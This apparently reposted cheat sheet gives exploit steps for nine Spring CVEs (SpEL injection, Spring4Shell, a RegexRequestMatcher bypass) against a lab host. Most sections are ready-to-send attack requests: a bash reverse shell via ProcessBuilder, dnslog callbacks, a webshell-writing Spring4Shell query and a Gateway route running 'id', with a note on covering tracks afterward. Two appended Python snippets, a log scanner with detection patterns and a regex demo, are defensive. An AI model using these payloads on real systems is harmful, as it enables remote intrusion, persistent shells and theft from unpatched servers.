1. Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
1) Vulnerability principle:
Spring Security OAuth is a module that provides security authentication support for the Spring framework. When it uses whitelabel views to handle errors, because Spring Expression Language (SpEL) is used, an attacker who is already authorized can execute commands remotely by constructing malicious parameters.
2) Operation tips:
Requires logging in with the credentials admin : admin
http://192.168.68.129:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
3) Affected versions:
2.0.0 to 2.0.9
1.0.0 to 1.0.5
2. Spring WebFlow Remote Code Execution Vulnerability (CVE-2017-4971)
1) Vulnerability principle:
Spring WebFlow is a framework for developing flow-based applications (such as shopping logic); it separates the definition of a flow from the classes and views that implement the flow's behaviour. In its 2.4.x versions, if we control the field during data binding, this leads to a SpEL expression injection vulnerability and ultimately arbitrary command execution.
2) Operation tips:
Add the following to the POST request body: _eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub
3) Affected versions: Spring Web Flow 2.4.0 to 2.4.4
3. Spring Data REST Remote Command Execution Vulnerability (CVE-2017-8046)
1) Vulnerability principle: Spring Data REST is built on top of Spring Data to help developers build REST-style web services more easily. In the PATCH method of the REST API (which implements RFC 6902), the value of path is passed into setValue, causing a SpEL expression to be evaluated and triggering remote command execution.
2) Operation tips:
PATCH /customers/1 HTTP/1.1
Host: 192.168.68.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 212
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,122,120,54,108,97,115,46,100,110,115,108,111,103,46,99,110}))/lastname", "value": "vulhub" }]
3) Affected versions:
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3
4. Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
1) Vulnerability principle:
2) Operation tips:
In the app.js bundle, find the connect function and add var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
Then connect; sending any field is enough.
3) Affected versions:
Spring Framework 5.0 to 5.0.4
Spring Framework 4.3 to 4.3.14
5. Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
1) Vulnerability principle:
2) Operation tips:
POST /users?page=4&size=5 HTTP/1.1
Host: 192.168.68.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.129:8080/users?page=&size=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping 8hjpmg.dnslog.cn")]=&password=&repeatedPassword=
3) Affected versions:
Spring Data Commons 1.13 to 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 to 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 to 3.0.5 (Kay SR5)
Older unsupported versions are also affected
6. Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
1) Vulnerability principle:
2) Operation tips:
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=040E58DCCE5809AD2948AC3AA317BE8D
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=040E58DCCE5809AD2948AC3AA317BE8D
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Visit http://192.168.68.129:8080/actuator/gateway/routes/hacktest
Afterwards there is still trace-cleanup work to do.
3) Affected versions:
Spring Cloud Gateway
3.1.0
3.0.0 to 3.0.6
Older, unsupported versions are also affected
7. Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
1) Vulnerability principle:
2) Operation tips:
POST /functionRouter HTTP/1.1
Host: 192.168.68.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping 3692av.dnslog.cn")
Content-Type: text/plain
Content-Length: 4
test
3) Affected versions:
Spring Cloud Function
3.1.6
3.2.2
Older, unsupported versions are also affected
8. Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965)
1) Vulnerability principle:
2) Operation tips:
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=84F9ECE52FD5260993C778C305D5BAD7
Connection: close
suffix:%>//
c1:Runtime
c2:<%
DNT:1
Visit: http://192.168.68.129:8080/tomcatwar.jsp?pwd=j&cmd=id
3) Affected versions:
Spring Framework
5.3.0 to 5.3.17
5.2.0 to 5.2.19
Older, unsupported versions are also affected
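Detection logic for the request shapes in sections 1 through 8, as an added example that is not part of the original notes: each access-log line is percent-decoded and checked for the SpEL and data-binding indicators these payloads share. The indicator names and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Indicator patterns drawn from the payload shapes shown in sections 1 to 8 of
# these notes: SpEL templates, Runtime/ProcessBuilder calls, data-binding
# ClassLoader access and the routing-expression header (added example).
INDICATORS = {
    "spel_template": re.compile(r"[#$]\{"),
    "spel_type_ref": re.compile(r"T\(\s*java\.lang\.(Runtime|ProcessBuilder)\s*\)"),
    "runtime_exec": re.compile(r"getRuntime\(\)\s*\.\s*exec\s*\("),
    "processbuilder": re.compile(r"new\s+java\.lang\.ProcessBuilder\s*\("),
    "classloader_binding": re.compile(r"class\.module\.classLoader\."),
    "routing_expression": re.compile(r"spring\.cloud\.function\.routing-expression", re.I),
}


def normalize(line: str) -> str:
    """Percent-decode twice so single- and double-encoded payloads (the
    CVE-2022-22965 query string is encoded) are inspected as the framework
    would see them."""
    for _ in range(2):
        line = unquote(line)
    return line


def scan_line(line: str) -> list:
    """Names of every indicator that fires on one decoded log line."""
    text = normalize(line)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_log(lines) -> list:
    """(line_number, indicators) for each suspicious line; benign lines skipped."""
    hits = []
    for num, line in enumerate(lines, start=1):
        found = scan_line(line)
        if found:
            hits.append((num, found))
    return hits


# Constructed sample access-log lines; the suspicious ones mirror the request
# shapes on this page with the command parts shortened to "...".
SAMPLE_LOG = [
    "GET /oauth/authorize?response_type=%24%7B233*233%7D&client_id=acme HTTP/1.1",
    'PATCH /customers/1 body=[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(...)/lastname"}]',
    "GET /?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1",
    "POST /functionRouter hdr=spring.cloud.function.routing-expression",
    "GET /users?page=1&size=5 HTTP/1.1",
]
```

Run `scan_log(SAMPLE_LOG)` to get the flagged line numbers with their indicators; the benign paging request produces no hit.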
9. Spring Security Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)
1) Vulnerability principle:
2) Operation tips:
http://192.168.68.129:8080/admin/%0atest
3) Affected versions:
Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
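The regex matcher behaviour behind section 9, as an added example in Python rather than Spring's own code: a rule such as `/admin/.*` compiled without DOTALL does not match the decoded path `/admin/\ntest`, because `.` excludes line terminators, while the same rule compiled with DOTALL still covers it. The `/admin/.*` rule is an assumption made for this example.

```python
import re
from urllib.parse import unquote

# Assumed authorization rule of the kind a regex-based matcher enforces:
# "everything under /admin/ needs an elevated role" (added example).
ADMIN_PATTERN = r"/admin/.*"


def decode_path(raw: str) -> str:
    """Percent-decode the request path the way a servlet container does before
    the matcher sees it, so %0a becomes a real newline character."""
    return unquote(raw)


def rule_applies_plain(path: str) -> bool:
    """Plain fullmatch: '.' does not match a newline, so a path with a literal
    LF after /admin/ falls outside the rule and is not treated as protected."""
    return re.fullmatch(ADMIN_PATTERN, path) is not None


def rule_applies_dotall(path: str) -> bool:
    """Same rule in DOTALL mode ((?s) in Python, Pattern.DOTALL in Java), so
    '.' also spans line terminators and the newline variant stays protected."""
    return re.fullmatch(ADMIN_PATTERN, path, flags=re.DOTALL) is not None


def evaluate(raw_path: str) -> dict:
    """Compare both matchers on one raw (still encoded) request path."""
    path = decode_path(raw_path)
    return {
        "path": path,
        "plain_rule_applies": rule_applies_plain(path),
        "dotall_rule_applies": rule_applies_dotall(path),
    }


if __name__ == "__main__":
    for raw in ("/admin/users", "/admin/%0atest"):
        print(raw, evaluate(raw))
```

Beyond fixing the pattern, configuring the matcher chain to deny any request that no rule matches closes the same gap regardless of how the regex is written.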
Copyright © 2003-2013 www.wpsshop.cn. All rights reserved.